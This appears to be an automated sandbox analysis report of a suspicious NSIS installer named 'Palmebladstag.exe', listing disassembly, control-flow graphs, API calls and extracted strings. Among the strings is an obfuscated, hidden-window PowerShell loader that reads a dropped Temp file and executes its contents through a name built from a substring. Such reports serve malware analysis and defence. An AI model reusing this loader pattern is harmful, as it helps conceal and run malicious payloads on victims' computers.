                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: FileFindFirst
                                            • String ID:
                                            • API String ID: 1974802433-0
                                            • Opcode ID: f2d9de5455a5ed5429e403469511e104ae85e187adf8a2b3e0bb110dd203aeef
                                            • Instruction ID: 3ab4b2e523f4ece34398282fff8650a64823828ee778d7c177d23f294cc8494d
                                            • Opcode Fuzzy Hash: f2d9de5455a5ed5429e403469511e104ae85e187adf8a2b3e0bb110dd203aeef
                                            • Instruction Fuzzy Hash: FAF0A032A041149AD700E7B4A949AEEB778CB15324F20067BE101E20C2C6B869859A2E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 163 4039b4-4039c6 164 403b07-403b16 163->164 165 4039cc-4039d2 163->165 167 403b65-403b7a 164->167 168 403b18-403b60 GetDlgItem * 2 call 403e87 SetClassLongA call 40140b 164->168 165->164 166 4039d8-4039e1 165->166 171 4039e3-4039f0 SetWindowPos 166->171 172 4039f6-4039f9 166->172 169 403bba-403bbf call 403ed3 167->169 170 403b7c-403b7f 167->170 168->167 182 403bc4-403bdf 169->182 174 403b81-403b8c call 401389 170->174 175 403bb2-403bb4 170->175 171->172 177 403a13-403a19 172->177 178 4039fb-403a0d ShowWindow 172->178 174->175 196 403b8e-403bad SendMessageA 174->196 175->169 181 403e54 175->181 183 403a35-403a38 177->183 184 403a1b-403a30 DestroyWindow 177->184 178->177 191 403e56-403e5d 181->191 189 403be1-403be3 call 40140b 182->189 190 403be8-403bee 182->190 186 403a3a-403a46 SetWindowLongA 183->186 187 403a4b-403a51 183->187 192 403e31-403e37 184->192 186->191 194 403af4-403b02 call 403eee 187->194 195 403a57-403a68 GetDlgItem 187->195 189->190 199 403e12-403e2b DestroyWindow KiUserCallbackDispatcher 190->199 200 403bf4-403bff 190->200 192->181 197 403e39-403e3f 192->197 194->191 201 403a87-403a8a 195->201 202 403a6a-403a81 SendMessageA IsWindowEnabled 195->202 196->191 197->181 204 403e41-403e4a ShowWindow 197->204 199->192 200->199 205 403c05-403c52 call 405b99 call 403e87 * 3 GetDlgItem 200->205 206 403a8c-403a8d 201->206 207 403a8f-403a92 201->207 202->181 202->201 204->181 233 403c54-403c59 205->233 234 403c5c-403c98 ShowWindow KiUserCallbackDispatcher call 403ea9 EnableWindow 205->234 211 403abd-403ac2 call 403e60 206->211 212 403aa0-403aa5 207->212 213 403a94-403a9a 207->213 211->194 216 403adb-403aee SendMessageA 212->216 218 403aa7-403aad 212->218 213->216 217 403a9c-403a9e 213->217 216->194 217->211 221 403ac4-403acd call 40140b 218->221 222 403aaf-403ab5 call 40140b 218->222 221->194 230 403acf-403ad9 221->230 231 403abb 222->231 230->231 231->211 233->234 237 403c9a-403c9b 234->237 238 403c9d 234->238 239 403c9f-403ccd GetSystemMenu EnableMenuItem SendMessageA 237->239 238->239 240 403ce2 239->240 241 403ccf-403ce0 SendMessageA 239->241 242 403ce8-403d21 call 403ebc call 405b77 lstrlenA call 405b99 SetWindowTextA call 401389 240->242 241->242 242->182 251 403d27-403d29 242->251 251->182 252 403d2f-403d33 251->252 253 403d52-403d66 DestroyWindow 252->253 254 403d35-403d3b 252->254 253->192 256 403d6c-403d99 CreateDialogParamA 253->256 254->181 255 403d41-403d47 254->255 255->182 258 403d4d 255->258 256->192 257 403d9f-403df6 call 403e87 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 256->257 257->181 263 403df8-403e0b ShowWindow call 403ed3 257->263 258->181 265 403e10 263->265 265->192
                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039F0
                                            • ShowWindow.USER32(?), ref: 00403A0D
                                            • DestroyWindow.USER32 ref: 00403A21
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A3D
                                            • GetDlgItem.USER32(?,?), ref: 00403A5E
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403A72
                                            • IsWindowEnabled.USER32(00000000), ref: 00403A79
                                            • GetDlgItem.USER32(?,00000001), ref: 00403B27
                                            • GetDlgItem.USER32(?,00000002), ref: 00403B31
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403B4B
                                            • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403B9C
                                            • GetDlgItem.USER32(?,00000003), ref: 00403C42
                                            • ShowWindow.USER32(00000000,?), ref: 00403C63
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403C75
                                            • EnableWindow.USER32(?,?), ref: 00403C90
                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CA6
                                            • EnableMenuItem.USER32(00000000), ref: 00403CAD
                                            • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403CC5
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403CD8
                                            • lstrlenA.KERNEL32(Brandbltets Setup: Completed,?,Brandbltets Setup: Completed,007A1F00), ref: 00403D01
                                            • SetWindowTextA.USER32(?,Brandbltets Setup: Completed), ref: 00403D10
                                            • ShowWindow.USER32(?,0000000A), ref: 00403E44
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID: Brandbltets Setup: Completed
                                            • API String ID: 3282139019-4139126671
                                            • Opcode ID: cea0dd865cb28cb834b794727d06d7ef0c874d7e2ee252b6e1483741d8effd68
                                            • Instruction ID: 08d6703954b26bba67f61acca2d9aa754b0d4f7535d1ee947126766f28ce6238
                                            • Opcode Fuzzy Hash: cea0dd865cb28cb834b794727d06d7ef0c874d7e2ee252b6e1483741d8effd68
                                            • Instruction Fuzzy Hash: 42C1C231904200ABEB21AF25ED45E2B7EACF745706F04453EFA41B11E1C77DA982DB6E

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 266 403622-40363a call 405ea2 269 40363c-40364c call 405ad5 266->269 270 40364e-40367f call 405a5e 266->270 279 4036a2-4036cb call 4038e7 call 405712 269->279 275 403681-403692 call 405a5e 270->275 276 403697-40369d lstrcatA 270->276 275->276 276->279 284 4036d1-4036d6 279->284 285 403752-40375a call 405712 279->285 284->285 286 4036d8-4036f0 call 405a5e 284->286 291 403768-40378d LoadImageA 285->291 292 40375c-403763 call 405b99 285->292 290 4036f5-4036fc 286->290 290->285 293 4036fe-403700 290->293 295 40380e-403816 call 40140b 291->295 296 40378f-4037bf RegisterClassA 291->296 292->291 297 403711-40371d lstrlenA 293->297 298 403702-40370f call 40564f 293->298 310 403820-40382b call 4038e7 295->310 311 403818-40381b 295->311 299 4037c5-403809 SystemParametersInfoA CreateWindowExA 296->299 300 4038dd 296->300 304 403745-40374d call 405624 call 405b77 297->304 305 40371f-40372d lstrcmpiA 297->305 298->297 299->295 302 4038df-4038e6 300->302 304->285 305->304 309 40372f-403739 GetFileAttributesA 305->309 314 40373b-40373d 309->314 315 40373f-403740 call 40566b 309->315 319 403831-40384e ShowWindow LoadLibraryA 310->319 320 4038b4-4038b5 call 404f56 310->320 311->302 314->304 314->315 315->304 321 403850-403855 LoadLibraryA 319->321 322 403857-403869 GetClassInfoA 319->322 326 4038ba-4038bc 320->326 321->322 324 403881-4038a4 DialogBoxParamA call 40140b 322->324 325 40386b-40387b GetClassInfoA RegisterClassA 322->325 332 4038a9-4038b2 call 403572 324->332 325->324 328 4038d6-4038d8 call 40140b 326->328 329 4038be-4038c4 326->329 328->300 329->311 330 4038ca-4038d1 call 40140b 329->330 330->311 332->302
                                            APIs
                                              • Part of subcall function 00405EA2: GetModuleHandleA.KERNEL32(?,?,?,00403134,00000008), ref: 00405EB4
                                              • Part of subcall function 00405EA2: LoadLibraryA.KERNELBASE(?,?,?,00403134,00000008), ref: 00405EBF
                                              • Part of subcall function 00405EA2: GetProcAddress.KERNEL32(00000000,?), ref: 00405ED0
                                            • lstrcatA.KERNEL32(1033,Brandbltets Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Brandbltets Setup: Completed,00000000,00000006,C:\Users\user\AppData\Local\Temp\,76233410,"C:\Users\user\Desktop\Palmebladstag.exe",00000000), ref: 0040369D
                                            • lstrlenA.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,C:\Users\user\AppData\Local\Temp\humles\kvarterslag,1033,Brandbltets Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Brandbltets Setup: Completed,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 00403712
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 00403725
                                            • GetFileAttributesA.KERNEL32(Remove folder: ), ref: 00403730
                                            • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\humles\kvarterslag), ref: 00403779
                                              • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                            • RegisterClassA.USER32(007A1EA0), ref: 004037B6
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037CE
                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403803
                                            • ShowWindow.USER32(00000005,00000000), ref: 00403839
                                            • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040384A
                                            • LoadLibraryA.KERNEL32(RichEd32), ref: 00403855
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 00403865
                                            • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403872
                                            • RegisterClassA.USER32(007A1EA0), ref: 0040387B
                                            • DialogBoxParamA.USER32(?,00000000,004039B4,00000000), ref: 0040389A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\Palmebladstag.exe"$.DEFAULT\Control Panel\International$.exe$1033$Brandbltets Setup: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\humles\kvarterslag$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                            • API String ID: 914957316-1277829359
                                            • Opcode ID: 8fc5f6563a68b5d77bf3c47204b92a62a9d55f5407a13483e9f6d5c9e603b9a6
                                            • Instruction ID: b0afc0e10dc8cbe2448bed9474bc03f366f348945261fe302a10aac9679cd79a
                                            • Opcode Fuzzy Hash: 8fc5f6563a68b5d77bf3c47204b92a62a9d55f5407a13483e9f6d5c9e603b9a6
                                            • Instruction Fuzzy Hash: FA61E6716442007EE710BB659C85F373AACEB8275AF00857EFA45B22E2D67D6D01CB2D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 337 402c33-402c81 GetTickCount GetModuleFileNameA call 405825 340 402c83-402c88 337->340 341 402c8d-402cbb call 405b77 call 40566b call 405b77 GetFileSize 337->341 342 402e65-402e69 340->342 349 402cc1 341->349 350 402da8-402db6 call 402bcf 341->350 352 402cc6-402cdd 349->352 356 402db8-402dbb 350->356 357 402e0b-402e10 350->357 354 402ce1-402ce3 call 403072 352->354 355 402cdf 352->355 361 402ce8-402cea 354->361 355->354 359 402dbd-402dd5 call 4030a4 call 403072 356->359 360 402ddf-402e09 GlobalAlloc call 4030a4 call 402e6c 356->360 357->342 359->357 385 402dd7-402ddd 359->385 360->357 384 402e1c-402e2d 360->384 363 402cf0-402cf7 361->363 364 402e12-402e1a call 402bcf 361->364 368 402d73-402d77 363->368 369 402cf9-402d0d call 4057e0 363->369 364->357 373 402d81-402d87 368->373 374 402d79-402d80 call 402bcf 368->374 369->373 388 402d0f-402d16 369->388 379 402d96-402da0 373->379 380 402d89-402d93 call 405f14 373->380 374->373 379->352 383 402da6 379->383 380->379 383->350 389 402e35-402e3a 384->389 390 402e2f 384->390 385->357 385->360 388->373 392 402d18-402d1f 388->392 394 402e3b-402e41 389->394 390->389 392->373 393 402d21-402d28 392->393 393->373 395 402d2a-402d31 393->395 394->394 396 402e43-402e5e SetFilePointer call 4057e0 394->396 395->373 397 402d33-402d53 395->397 400 402e63 396->400 397->357 399 402d59-402d5d 397->399 401 402d65-402d6d 399->401 402 402d5f-402d63 399->402 400->342 401->373 403 402d6f-402d71 401->403 402->383 402->401 403->373
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402C44
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Palmebladstag.exe,00000400), ref: 00402C60
                                              • Part of subcall function 00405825: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Palmebladstag.exe,80000000,00000003), ref: 00405829
                                              • Part of subcall function 00405825: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040584B
                                            • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Palmebladstag.exe,C:\Users\user\Desktop\Palmebladstag.exe,80000000,00000003), ref: 00402CAC
                                            Strings
                                            • C:\Users\user\Desktop\Palmebladstag.exe, xrefs: 00402C4A, 00402C59, 00402C6D, 00402C8D
                                            • soft, xrefs: 00402D21
                                            • Error launching installer, xrefs: 00402C83
                                            • Null, xrefs: 00402D2A
                                            • C:\Users\user\Desktop, xrefs: 00402C8E, 00402C93, 00402C99
                                            • "C:\Users\user\Desktop\Palmebladstag.exe", xrefs: 00402C33
                                            • Inst, xrefs: 00402D18
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C3D
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E0B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Palmebladstag.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Palmebladstag.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 4283519449-3763924008
                                            • Opcode ID: ef6d3d8ba9e0c0f69561d0ffe4d4f58a5de8ec52673e440660fce34fe50d0f0c
                                            • Instruction ID: 9cc68cb9a8033aa8cfa9fb84db7bfe2d2ab72e09e198f7c7f71ed61724ba903c
                                            • Opcode Fuzzy Hash: ef6d3d8ba9e0c0f69561d0ffe4d4f58a5de8ec52673e440660fce34fe50d0f0c
                                            • Instruction Fuzzy Hash: 74510471D40204ABDB209F65DE89B6E7BA8EF40354F14403BFA04B62D1C7BC9E418BAD

                                            Control-flow Graph

                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,farimagsgade,C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145,00000000,00000000,00000031), ref: 0040177E
                                            • CompareFileTime.KERNEL32(-00000014,?,farimagsgade,farimagsgade,00000000,00000000,farimagsgade,C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145,00000000,00000000,00000031), ref: 004017A8
                                              • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                              • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                              • Part of subcall function 00404E84: lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00402FA6,00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8), ref: 00404EE0
                                              • Part of subcall function 00404E84: SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\), ref: 00404EF2
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                              • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: -windowstyle hidden ; $Tangsnarrerne=Get-Content 'C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Menneskeliggrelsens.Lyn';$Ebeneous122=$Tangsnarrerne.SubString(52669,3);.$Ebeneous122($Tangsnarrerne)$Afvandrende146\Microsoft\Windows\treefish\Uninstall\kemiingenirerne$C:\Users\user\AppData\Local\Temp\humles\kvarterslag\Beedi145$farimagsgade$prludyur\ma\
                                            • API String ID: 1941528284-2249989714
                                            • Opcode ID: c5d49728913c18abe0f5a13e4260bb4c5984cb3d9c03b91a32a88d09cfa20081
                                            • Instruction ID: df8d039fdd937f1c478db27dfce12e75bce6feb5164cf919340bcacede668491
                                            • Opcode Fuzzy Hash: c5d49728913c18abe0f5a13e4260bb4c5984cb3d9c03b91a32a88d09cfa20081
                                            • Instruction Fuzzy Hash: F241B771900615BACB10BBA5CC46DAF7979DF42368F20423BF525F10E2DA3C5A419A6D

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 602 404e84-404e99 603 404f4f-404f53 602->603 604 404e9f-404eb1 602->604 605 404eb3-404eb7 call 405b99 604->605 606 404ebc-404ec8 lstrlenA 604->606 605->606 608 404ee5-404ee9 606->608 609 404eca-404eda lstrlenA 606->609 611 404ef8-404efc 608->611 612 404eeb-404ef2 SetWindowTextA 608->612 609->603 610 404edc-404ee0 lstrcatA 609->610 610->608 613 404f42-404f44 611->613 614 404efe-404f40 SendMessageA * 3 611->614 612->611 613->603 615 404f46-404f49 613->615 614->613 615->603
                                            APIs
                                            • lstrlenA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                            • lstrlenA.KERNEL32(00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                            • lstrcatA.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00402FA6,00402FA6,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,00000000,0078DCE3,007898A8), ref: 00404EE0
                                            • SetWindowTextA.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\), ref: 00404EF2
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2163518572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2163503878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163534513.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163549172.00000000007CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2163978071.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Palmebladstag.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nspDBF8.tmp\
                                            • API String ID: 2531174081-2117350323
                                            • Opcode ID: ad2c4395177b3aef51715462b01d156c4014b02c4ac43bcc3cbf8c28c719c19f
                                            • Instruction ID: 0879e44440130bf100c4abc817e106b172b9c081b4a19821dc72f8a86b472426
                                            • Opcode Fuzzy Hash: ad2c4395177b3aef51715462b01d156c4014b02c4ac43bcc3cbf8c28c719c19f
                                            • Instruction Fuzzy Hash: E3216071900118BFDB019FA5CD849DEBFB9EB45354F14807AF904B6291C6785E40CBA4

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
